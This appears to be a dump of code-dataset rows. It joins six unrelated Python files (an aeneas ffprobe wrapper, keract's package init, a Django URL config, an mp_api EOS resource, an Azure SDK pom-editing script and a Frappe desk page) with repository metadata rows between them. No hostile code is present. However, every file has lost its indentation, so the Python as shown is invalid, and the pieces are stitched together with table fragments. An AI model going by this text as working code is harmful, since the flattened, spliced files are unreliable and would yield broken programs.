# coding=utf-8
# aeneas is a Python/C library and a set of tools
# to automagically synchronize audio and text (aka forced alignment)
#
# Copyright (C) 2012-2013, Alberto Pettarin (www.albertopettarin.it)
# Copyright (C) 2013-2015, ReadBeyond Srl (www.readbeyond.it)
# Copyright (C) 2015-2017, Alberto Pettarin (www.albertopettarin.it)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
This module contains the following classes:
* :class:`~aeneas.ffprobewrapper.FFPROBEWrapper`, a wrapper around ``ffprobe`` to read the properties of an audio file;
* :class:`~aeneas.ffprobewrapper.FFPROBEParsingError`,
* :class:`~aeneas.ffprobewrapper.FFPROBEPathError`, and
* :class:`~aeneas.ffprobewrapper.FFPROBEUnsupportedFormatError`,
representing errors while reading the properties of audio files.
"""
from __future__ import absolute_import
from __future__ import print_function
import re
import subprocess
from aeneas.exacttiming import TimeValue
from aeneas.logger import Loggable
from aeneas.runtimeconfiguration import RuntimeConfiguration
import aeneas.globalfunctions as gf
class FFPROBEParsingError(Exception):
"""
Error raised when the call to ``ffprobe`` does not produce any output.
"""
pass
class FFPROBEPathError(Exception):
"""
Error raised when the path to ``ffprobe`` is not a valid executable.
.. versionadded:: 1.4.1
"""
pass
class FFPROBEUnsupportedFormatError(Exception):
"""
Error raised when ``ffprobe`` cannot decode the format of the given file.
"""
pass
class FFPROBEWrapper(Loggable):
"""
Wrapper around ``ffprobe`` to read the properties of an audio file.
It will perform a call like::
$ ffprobe -select_streams a -show_streams /path/to/audio/file.mp3
and it will parse the first ``[STREAM]`` element returned::
[STREAM]
index=0
codec_name=mp3
codec_long_name=MP3 (MPEG audio layer 3)
profile=unknown
codec_type=audio
codec_time_base=1/44100
codec_tag_string=[0][0][0][0]
codec_tag=0x0000
sample_fmt=s16p
sample_rate=44100
channels=1
channel_layout=mono
bits_per_sample=0
id=N/A
r_frame_rate=0/0
avg_frame_rate=0/0
time_base=1/14112000
start_pts=0
start_time=0.000000
duration_ts=1545083190
duration=109.487188
bit_rate=128000
max_bit_rate=N/A
bits_per_raw_sample=N/A
nb_frames=N/A
nb_read_frames=N/A
nb_read_packets=N/A
DISPOSITION:default=0
DISPOSITION:dub=0
DISPOSITION:original=0
DISPOSITION:comment=0
DISPOSITION:lyrics=0
DISPOSITION:karaoke=0
DISPOSITION:forced=0
DISPOSITION:hearing_impaired=0
DISPOSITION:visual_impaired=0
DISPOSITION:clean_effects=0
DISPOSITION:attached_pic=0
[/STREAM]
:param rconf: a runtime configuration
:type rconf: :class:`~aeneas.runtimeconfiguration.RuntimeConfiguration`
:param logger: the logger object
:type logger: :class:`~aeneas.logger.Logger`
"""
FFPROBE_PARAMETERS = [
"-select_streams",
"a",
"-show_streams"
]
""" ``ffprobe`` parameters """
STDERR_DURATION_REGEX = re.compile(r"Duration: ([0-9]*):([0-9]*):([0-9]*)\.([0-9]*)")
""" Regex to match ``ffprobe`` stderr duration values """
STDOUT_BEGIN_STREAM = "[STREAM]"
""" ``ffprobe`` stdout begin stream tag """
STDOUT_CHANNELS = "channels"
""" ``ffprobe`` stdout channels keyword """
STDOUT_CODEC_NAME = "codec_name"
""" ``ffprobe`` stdout codec name (format) keyword """
STDOUT_END_STREAM = "[/STREAM]"
""" ``ffprobe`` stdout end stream tag """
STDOUT_DURATION = "duration"
""" ``ffprobe`` stdout duration keyword """
STDOUT_SAMPLE_RATE = "sample_rate"
""" ``ffprobe`` stdout sample rate keyword """
TAG = u"FFPROBEWrapper"
def read_properties(self, audio_file_path):
"""
Read the properties of an audio file
and return them as a dictionary.
Example: ::
d["index"]=0
d["codec_name"]=mp3
d["codec_long_name"]=MP3 (MPEG audio layer 3)
d["profile"]=unknown
d["codec_type"]=audio
d["codec_time_base"]=1/44100
d["codec_tag_string"]=[0][0][0][0]
d["codec_tag"]=0x0000
d["sample_fmt"]=s16p
d["sample_rate"]=44100
d["channels"]=1
d["channel_layout"]=mono
d["bits_per_sample"]=0
d["id"]=N/A
d["r_frame_rate"]=0/0
d["avg_frame_rate"]=0/0
d["time_base"]=1/14112000
d["start_pts"]=0
d["start_time"]=0.000000
d["duration_ts"]=1545083190
d["duration"]=109.487188
d["bit_rate"]=128000
d["max_bit_rate"]=N/A
d["bits_per_raw_sample"]=N/A
d["nb_frames"]=N/A
d["nb_read_frames"]=N/A
d["nb_read_packets"]=N/A
d["DISPOSITION:default"]=0
d["DISPOSITION:dub"]=0
d["DISPOSITION:original"]=0
d["DISPOSITION:comment"]=0
d["DISPOSITION:lyrics"]=0
d["DISPOSITION:karaoke"]=0
d["DISPOSITION:forced"]=0
d["DISPOSITION:hearing_impaired"]=0
d["DISPOSITION:visual_impaired"]=0
d["DISPOSITION:clean_effects"]=0
d["DISPOSITION:attached_pic"]=0
:param string audio_file_path: the path of the audio file to analyze
:rtype: dict
:raises: TypeError: if ``audio_file_path`` is None
:raises: OSError: if the file at ``audio_file_path`` cannot be read
:raises: FFPROBEParsingError: if the call to ``ffprobe`` does not produce any output
:raises: FFPROBEPathError: if the path to the ``ffprobe`` executable cannot be called
:raises: FFPROBEUnsupportedFormatError: if the file has a format not supported by ``ffprobe``
"""
# test if we can read the file at audio_file_path
if audio_file_path is None:
self.log_exc(u"The audio file path is None", None, True, TypeError)
if not gf.file_can_be_read(audio_file_path):
self.log_exc(u"Input file '%s' cannot be read" % (audio_file_path), None, True, OSError)
# call ffprobe
arguments = [self.rconf[RuntimeConfiguration.FFPROBE_PATH]]
arguments.extend(self.FFPROBE_PARAMETERS)
arguments.append(audio_file_path)
self.log([u"Calling with arguments '%s'", arguments])
try:
proc = subprocess.Popen(
arguments,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE
)
(stdoutdata, stderrdata) = proc.communicate()
proc.stdout.close()
proc.stdin.close()
proc.stderr.close()
except OSError as exc:
self.log_exc(u"Unable to call the '%s' ffprobe executable" % (self.rconf[RuntimeConfiguration.FFPROBE_PATH]), exc, True, FFPROBEPathError)
self.log(u"Call completed")
# check there is some output
if (stdoutdata is None) or (len(stderrdata) == 0):
self.log_exc(u"ffprobe produced no output", None, True, FFPROBEParsingError)
# decode stdoutdata and stderrdata to Unicode string
try:
stdoutdata = gf.safe_unicode(stdoutdata)
stderrdata = gf.safe_unicode(stderrdata)
except UnicodeDecodeError as exc:
self.log_exc(u"Unable to decode ffprobe out/err", exc, True, FFPROBEParsingError)
# dictionary for the results
results = {
self.STDOUT_CHANNELS: None,
self.STDOUT_CODEC_NAME: None,
self.STDOUT_DURATION: None,
self.STDOUT_SAMPLE_RATE: None
}
# scan the first audio stream the ffprobe stdout output
# TODO more robust parsing
# TODO deal with multiple audio streams
for line in stdoutdata.splitlines():
if line == self.STDOUT_END_STREAM:
self.log(u"Reached end of the stream")
break
elif len(line.split("=")) == 2:
key, value = line.split("=")
results[key] = value
self.log([u"Found property '%s'='%s'", key, value])
try:
self.log([u"Duration found in stdout: '%s'", results[self.STDOUT_DURATION]])
results[self.STDOUT_DURATION] = TimeValue(results[self.STDOUT_DURATION])
self.log(u"Valid duration")
except:
self.log_warn(u"Invalid duration")
results[self.STDOUT_DURATION] = None
# try scanning ffprobe stderr output
for line in stderrdata.splitlines():
match = self.STDERR_DURATION_REGEX.search(line)
if match is not None:
self.log([u"Found matching line '%s'", line])
results[self.STDOUT_DURATION] = gf.time_from_hhmmssmmm(line)
self.log([u"Extracted duration '%.3f'", results[self.STDOUT_DURATION]])
break
if results[self.STDOUT_DURATION] is None:
self.log_exc(u"No duration found in stdout or stderr. Unsupported audio file format?", None, True, FFPROBEUnsupportedFormatError)
# return dictionary
self.log(u"Returning dict")
return results
| 35.913495 | 150 | 0.612968 |
acf6db9794d44925d3cb8294a5c9fc474e500a4a | 736 | py | Python | keract/__init__.py | jimypeter/keract | fef88628f92ae412c35df7e33c65660d7a3eb584 | [
"MIT"
] | 1 | 2021-05-27T11:57:22.000Z | 2021-05-27T11:57:22.000Z | keract/__init__.py | jimypeter/keract | fef88628f92ae412c35df7e33c65660d7a3eb584 | [
"MIT"
] | null | null | null | keract/__init__.py | jimypeter/keract | fef88628f92ae412c35df7e33c65660d7a3eb584 | [
"MIT"
] | null | null | null | import importlib
tf_spec = importlib.util.find_spec("tensorflow")
if tf_spec is None:
raise ImportError("No valid tensorflow installation found. Please install "
"tensorflow>=2.0 or tensorflow-gpu>=2.0")
from keract.keract import display_activations # noqa
from keract.keract import display_gradients_of_trainable_weights # noqa
from keract.keract import display_heatmaps # noqa
from keract.keract import get_activations # noqa
from keract.keract import get_gradients_of_activations # noqa
from keract.keract import get_gradients_of_trainable_weights # noqa
from keract.keract import load_activations_from_json_file # noqa
from keract.keract import persist_to_json_file # noqa
__version__ = '4.3.2'
| 40.888889 | 79 | 0.793478 |
acf6dcd2128ec850651e8f4ffef88dc4349c8198 | 798 | py | Python | chatty/urls.py | BOVAGE/chatty | 745bf0d40926def87612d9ab24eb710353ed5e17 | [
"MIT"
] | null | null | null | chatty/urls.py | BOVAGE/chatty | 745bf0d40926def87612d9ab24eb710353ed5e17 | [
"MIT"
] | null | null | null | chatty/urls.py | BOVAGE/chatty | 745bf0d40926def87612d9ab24eb710353ed5e17 | [
"MIT"
] | null | null | null | """chatty URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/4.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('chat/', include('chat.urls')),
]
| 34.695652 | 77 | 0.701754 |
acf6dce03762ee63bc992c5ec21d3d7e57047c0a | 555 | py | Python | src/mp_api/eos/resources.py | jmmshn/api | 5254a453f6ec749793639e4ec08bea14628c7dc3 | [
"BSD-3-Clause-LBNL"
] | null | null | null | src/mp_api/eos/resources.py | jmmshn/api | 5254a453f6ec749793639e4ec08bea14628c7dc3 | [
"BSD-3-Clause-LBNL"
] | 159 | 2020-11-16T16:02:31.000Z | 2022-03-28T15:03:38.000Z | src/mp_api/eos/resources.py | jmmshn/api | 5254a453f6ec749793639e4ec08bea14628c7dc3 | [
"BSD-3-Clause-LBNL"
] | null | null | null | from mp_api.core.resource import Resource
from mp_api.eos.models import EOSDoc
from mp_api.core.query_operator import PaginationQuery, SortQuery, SparseFieldsQuery
from mp_api.eos.query_operators import EnergyVolumeQuery
def eos_resource(eos_store):
resource = Resource(
eos_store,
EOSDoc,
query_operators=[
EnergyVolumeQuery(),
SortQuery(),
PaginationQuery(),
SparseFieldsQuery(EOSDoc, default_fields=["task_id"]),
],
tags=["EOS"],
)
return resource
| 25.227273 | 84 | 0.664865 |
acf6dd9ebe10b7e8c57c9169429b632ec3a73203 | 7,728 | py | Python | sdk/spring/scripts/replace_util.py | waynemo/azure-sdk-for-java | 76aebf62380d90052ed9bd3416ea02615d3f5aa0 | [
"MIT"
] | null | null | null | sdk/spring/scripts/replace_util.py | waynemo/azure-sdk-for-java | 76aebf62380d90052ed9bd3416ea02615d3f5aa0 | [
"MIT"
] | null | null | null | sdk/spring/scripts/replace_util.py | waynemo/azure-sdk-for-java | 76aebf62380d90052ed9bd3416ea02615d3f5aa0 | [
"MIT"
] | null | null | null | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import argparse
import os
import time
import in_place
from log import log, Log
from artifact_id_pair import ArtifactIdPair
from version_update_item import VersionUpdateItem
X_VERSION_UPDATE = 'x-version-update'
X_INCLUDE_UPDATE = 'x-include-update'
ARTIFACT_ID_PAIRS = 'artifact_id_pairs'
VERSION_UPDATE_ITEMS = 'version_update_items'
config = {
'cosmos': {
'sdk/cosmos/azure-spring-data-cosmos-test/pom.xml': {
VERSION_UPDATE_ITEMS: (
VersionUpdateItem('org.springframework.boot:spring-boot-starter-parent', '2.2.10.RELEASE'),
)
}
},
'spring': {
'sdk/spring/azure-spring-boot-test-core/pom.xml': {
VERSION_UPDATE_ITEMS: (
VersionUpdateItem('org.springframework.boot:spring-boot-starter-parent', '2.2.9.RELEASE'),
)
},
'sdk/spring/azure-spring-boot-test-aad/pom.xml': {
VERSION_UPDATE_ITEMS: (
VersionUpdateItem('org.springframework.boot:spring-boot-starter-parent', '2.2.9.RELEASE'),
)
},
'sdk/spring/azure-spring-boot-test-application/pom.xml': {
VERSION_UPDATE_ITEMS: (
VersionUpdateItem('org.springframework.boot:spring-boot-starter-parent', '2.2.9.RELEASE'),
)
},
'sdk/spring/azure-spring-boot-test-cosmos/pom.xml': {
VERSION_UPDATE_ITEMS: (
VersionUpdateItem('org.springframework.boot:spring-boot-starter-parent', '2.2.9.RELEASE'),
)
},
'sdk/spring/azure-spring-boot-test-keyvault/pom.xml': {
VERSION_UPDATE_ITEMS: (
VersionUpdateItem('org.springframework.boot:spring-boot-starter-parent', '2.2.9.RELEASE'),
)
},
'sdk/spring/azure-spring-boot-test-servicebus-jms/pom.xml': {
VERSION_UPDATE_ITEMS: (
VersionUpdateItem('org.springframework.boot:spring-boot-starter-parent', '2.2.9.RELEASE'),
)
}
}
}
def main():
start_time = time.time()
change_to_root_dir()
log.debug('Current working directory = {}.'.format(os.getcwd()))
args = get_args()
init_log(args)
replace(args.module)
elapsed_time = time.time() - start_time
log.info('elapsed_time = {}'.format(elapsed_time))
def change_to_root_dir():
os.chdir(os.path.dirname(os.path.realpath(__file__)))
os.chdir('../../..')
def get_args():
parser = argparse.ArgumentParser(
description = 'Replace artifact id in pom file.'
)
parser.add_argument(
'--module',
type = str,
choices = ['spring', 'cosmos'],
required = False,
default = 'cosmos',
help = 'Specify the target module.'
)
parser.add_argument(
'--log',
type = str,
choices = ['debug', 'info', 'warn', 'error', 'none'],
required = False,
default = 'info',
help = 'Set log level.'
)
parser.add_argument(
'--color',
type = str,
choices = ['true', 'false'],
required = False,
default = 'true',
help = 'Whether need colorful log.'
)
return parser.parse_args()
def init_log(args):
log_dict = {
'debug': Log.DEBUG,
'info': Log.INFO,
'warn': Log.WARN,
'error': Log.ERROR,
'none': Log.NONE
}
log.set_log_level(log_dict[args.log])
color_dict = {
'true': True,
'false': False
}
log.set_color(color_dict[args.color])
def replace(module):
"""
Replace action
:param module: module name
"""
for pom in config[module].keys():
replace_artifact_id(module, pom)
replace_version(module, pom)
def get_str(tuple_obj):
"""
Return str list for tuple obj for logger.
:param tuple_obj: tuple obj
:return: string list
"""
str_list = list()
for item in tuple_obj:
str_list.append(str(item))
return str_list
def replace_artifact_id(module, pom):
"""
Replace artifactId in dependency and plugin part.
:param module: module name
:param pom: pom file path
"""
log.debug('Replacing artifact id in file: {}'.format(pom, module))
pom_dict = config[module][pom]
if ARTIFACT_ID_PAIRS not in pom_dict:
log.warn('No config key {} in pom parameters.'.format(ARTIFACT_ID_PAIRS))
return
artifact_id_pairs = pom_dict[ARTIFACT_ID_PAIRS]
log.debug('Module: {}, artifact ids: {}'.format(module, get_str(artifact_id_pairs)))
with in_place.InPlace(pom) as file:
line_num = 0
for line in file:
line_num = line_num + 1
for artifact_id_pair in artifact_id_pairs:
if artifact_id_pair.old_artifact_id in line:
new_line = line.replace(artifact_id_pair.old_artifact_id, artifact_id_pair.new_artifact_id)
log.debug('Updating artifact id in line {}'.format(line_num))
log.debug(' old_line = {}.'.format(line.strip('\n')))
log.debug(' new_line = {}.'.format(new_line.strip('\n')))
line = new_line
file.write(line)
def replace_version(module, pom):
"""
Replace version in dependency and plugin part.
:param module: module name
:param pom: pom file path
"""
log.debug('Replacing version in file: {}'.format(pom))
pom_dict = config[module][pom]
if VERSION_UPDATE_ITEMS not in pom_dict:
log.warn('No config key {} in pom parameters.'.format(VERSION_UPDATE_ITEMS))
return
version_update_items = pom_dict[VERSION_UPDATE_ITEMS]
log.debug('Module: {}, versions: {}'.format(module, get_str(version_update_items)))
with in_place.InPlace(pom) as file:
line_num = 0
for line in file:
line_num = line_num + 1
for version_update_item in version_update_items:
if version_update_item.id in line:
# update version in dependency part
if X_VERSION_UPDATE in line:
old_version = line[(line.index('<version>') + 9):line.index('</version>')]
if old_version != version_update_item.new_version:
new_line = line.replace(old_version, version_update_item.new_version)
log.debug('Updating version of dependency in line {}'.format(line_num))
log.debug(' old_line = {}.'.format(line.strip('\n')))
log.debug(' new_line = {}.'.format(new_line.strip('\n')))
line = new_line
else:
log.warn('The same with new version in dependency part.')
# update version in plugin part
elif X_INCLUDE_UPDATE in line:
old_version = line[(line.index('[') + 1):line.index(']')]
if old_version != version_update_item.new_version:
new_line = line.replace(old_version, version_update_item.new_version)
log.debug('Updating line {}'.format(line_num))
log.debug(' old_line = {}.'.format(line.strip('\n')))
log.debug(' new_line = {}.'.format(new_line.strip('\n')))
line = new_line
else:
log.warn('The same with new version in plugin part.')
file.write(line)
if __name__ == '__main__':
main() | 34.810811 | 111 | 0.575958 |
acf6dde00059801efca98c336d62ad92aaf80348 | 2,831 | py | Python | frappe/www/app.py | ssuda777/frappe | d3f3df2ce15154aecc1d9d6d07d947e72c2e8c6e | [
"MIT"
] | 1 | 2021-06-11T10:28:07.000Z | 2021-06-11T10:28:07.000Z | frappe/www/app.py | JMBodz/frappe | eb218a06d1cbfc3a8f1cc00ba8dac2c927d2f71d | [
"MIT"
] | 3 | 2021-08-23T15:20:28.000Z | 2022-03-27T07:47:36.000Z | frappe/www/app.py | JMBodz/frappe | eb218a06d1cbfc3a8f1cc00ba8dac2c927d2f71d | [
"MIT"
] | 1 | 2021-08-03T07:12:43.000Z | 2021-08-03T07:12:43.000Z | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
no_cache = 1
import os, re
import frappe
from frappe import _
import frappe.sessions
from frappe.utils.jinja_globals import is_rtl
def get_context(context):
if frappe.session.user == "Guest":
frappe.throw(_("Log in to access this page."), frappe.PermissionError)
elif frappe.db.get_value("User", frappe.session.user, "user_type") == "Website User":
frappe.throw(_("You are not permitted to access this page."), frappe.PermissionError)
hooks = frappe.get_hooks()
try:
boot = frappe.sessions.get()
except Exception as e:
boot = frappe._dict(status='failed', error = str(e))
print(frappe.get_traceback())
# this needs commit
csrf_token = frappe.sessions.get_csrf_token()
frappe.db.commit()
desk_theme = frappe.db.get_value("User", frappe.session.user, "desk_theme")
boot_json = frappe.as_json(boot)
# remove script tags from boot
boot_json = re.sub(r"\<script[^<]*\</script\>", "", boot_json)
# TODO: Find better fix
boot_json = re.sub(r"</script\>", "", boot_json)
context.update({
"no_cache": 1,
"build_version": frappe.utils.get_build_version(),
"include_js": hooks["app_include_js"],
"include_css": hooks["app_include_css"],
"layout_direction": "rtl" if is_rtl() else "ltr",
"lang": frappe.local.lang,
"sounds": hooks["sounds"],
"boot": boot if context.get("for_mobile") else boot_json,
"desk_theme": desk_theme or "Light",
"csrf_token": csrf_token,
"google_analytics_id": frappe.conf.get("google_analytics_id"),
"google_analytics_anonymize_ip": frappe.conf.get("google_analytics_anonymize_ip"),
"mixpanel_id": frappe.conf.get("mixpanel_id")
})
return context
@frappe.whitelist()
def get_desk_assets(build_version):
"""Get desk assets to be loaded for mobile app"""
data = get_context({"for_mobile": True})
assets = [{"type": "js", "data": ""}, {"type": "css", "data": ""}]
if build_version != data["build_version"]:
# new build, send assets
for path in data["include_js"]:
# assets path shouldn't start with /
# as it points to different location altogether
if path.startswith('/assets/'):
path = path.replace('/assets/', 'assets/')
try:
with open(os.path.join(frappe.local.sites_path, path) ,"r") as f:
assets[0]["data"] = assets[0]["data"] + "\n" + frappe.safe_decode(f.read(), "utf-8")
except IOError:
pass
for path in data["include_css"]:
if path.startswith('/assets/'):
path = path.replace('/assets/', 'assets/')
try:
with open(os.path.join(frappe.local.sites_path, path) ,"r") as f:
assets[1]["data"] = assets[1]["data"] + "\n" + frappe.safe_decode(f.read(), "utf-8")
except IOError:
pass
return {
"build_version": data["build_version"],
"boot": data["boot"],
"assets": assets
}
| 31.455556 | 89 | 0.683504 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.